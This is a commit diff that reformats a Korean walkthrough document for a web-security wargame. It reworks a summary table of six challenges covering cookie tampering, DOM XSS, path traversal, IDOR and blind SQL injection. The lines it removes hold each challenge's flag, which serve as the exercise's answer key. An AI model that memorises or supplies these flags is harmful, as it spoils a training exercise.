<commit_message>
Improve walkthrough document layout
</commit_message>
<xml_diff>
--- a/docs/walkthrough/EST_워게임_문제_워크스루.docx
+++ b/docs/walkthrough/EST_워게임_문제_워크스루.docx
@@ -4,10 +4,14 @@
   <w:body>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Title"/>
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+          <w:b/>
+          <w:sz w:val="48"/>
+        </w:rPr>
         <w:t>EST 워게임 문제 워크스루</w:t>
       </w:r>
     </w:p>
@@ -16,17 +20,12 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:t>Notion 업로드와 팀 공유를 고려해 문제별 목표, 풀이 절차, 핵심 페이로드, 정답을 정리했습니다.</w:t>
+        <w:t>난이도 재조정 반영본 · 문제별 페이지 분리</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>생성일: 2026-07-13</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>전제: 사이트에서 분대명을 먼저 등록해야 플래그 제출이 정상 처리됩니다.</w:t>
+        <w:t>기준일: 2026-07-13</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -34,87 +33,154 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:t>전체 문제 요약</w:t>
+        <w:t>난이도 조정 요약</w:t>
       </w:r>
     </w:p>
     <w:tbl>
       <w:tblPr>
         <w:tblStyle w:val="TableGrid"/>
         <w:tblW w:type="auto" w:w="0"/>
+        <w:jc w:val="center"/>
         <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1440"/>
-        <w:gridCol w:w="1440"/>
-        <w:gridCol w:w="1440"/>
-        <w:gridCol w:w="1440"/>
-        <w:gridCol w:w="1440"/>
-        <w:gridCol w:w="1440"/>
+        <w:gridCol w:w="1632"/>
+        <w:gridCol w:w="1632"/>
+        <w:gridCol w:w="1632"/>
+        <w:gridCol w:w="1632"/>
+        <w:gridCol w:w="1632"/>
+        <w:gridCol w:w="1632"/>
       </w:tblGrid>
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
-            <w:shd w:fill="D9EAD3"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="2F3A24"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:color w:val="FFFFFF"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>번호</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
-            <w:shd w:fill="D9EAD3"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="2F3A24"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:color w:val="FFFFFF"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>문제</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
-            <w:shd w:fill="D9EAD3"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="2F3A24"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:color w:val="FFFFFF"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>분류</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
-            <w:shd w:fill="D9EAD3"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="2F3A24"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:color w:val="FFFFFF"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>난이도</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
-            <w:shd w:fill="D9EAD3"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="2F3A24"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:color w:val="FFFFFF"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>전과</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
-            <w:shd w:fill="D9EAD3"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
+            <w:shd w:fill="2F3A24"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>FLAG</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b/>
+                <w:color w:val="FFFFFF"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>조정 판단</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -122,61 +188,121 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>1</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>세션 그림자</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>쿠키 변조</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>초급</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>150</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>FLAG{cookie_role_admin_shadow}</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>쿠키 값 변경만으로 확인 가능한 입문형 문제라 유지.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -184,61 +310,121 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>2</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>비문 공지 검색소</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>반사 게시판 검색</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>Boolean Blind SQL Injection</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>DOM XSS</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>중급</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>초급</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>250</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>180</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>FLAG{boolean_blind_notice_42c7}</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>innerHTML과 이벤트 핸들러 단서가 명확해서 초급으로 하향.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -246,61 +432,121 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>3</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>반사 게시판 검색</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>영상 보급창</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>DOM XSS</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Path Traversal</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>중급 입문</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>중급</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>225</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>260</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>FLAG{dom_xss_reflected_search_alert}</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>allowed.png/ 디렉터리 단서를 노출했으므로 중급으로 하향.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -308,61 +554,121 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>4</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>영상 보급창</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>코인 제국 보급 작전</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>Path Traversal</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Client Trust</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>상급 입문</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>중급</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>300</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>260</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>FLAG{image_vault_path_filter_bypass}</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>브라우저 저장소 조작으로 풀 수 있어 300점에서 하향.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -370,61 +676,121 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>5</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>코인 제국 보급 작전</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>작전 보고서 열람소</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>Client Trust</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>IDOR</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>중급</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>300</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>280</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>FLAG{idle_empire_client_trust_bypass}</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>URL 파라미터 관찰과 번호 추측 문제라 중급으로 조정.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -432,61 +798,121 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
               <w:t>6</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>작전 보고서 열람소</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>비문 공지 검색소</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="dxa" w:w="1440"/>
+            <w:tcW w:type="dxa" w:w="1632"/>
+            <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r/>
             <w:r>
-              <w:t>IDOR</w:t>
+              <w:rPr>
+                <w:rFonts w:ascii="Malgun Gothic" w:hAnsi="Malgun Gothic" w:eastAsia="Malgun Gothic"/>
+                <w:b w:val="0"/>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Boolean Blind SQL Injection</w:t>
             </w:r>
           </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
